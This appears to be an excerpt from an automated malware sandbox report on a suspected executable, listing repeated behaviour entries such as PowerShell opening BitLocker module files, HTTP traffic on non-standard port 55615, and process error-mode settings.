                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49723
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49724
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
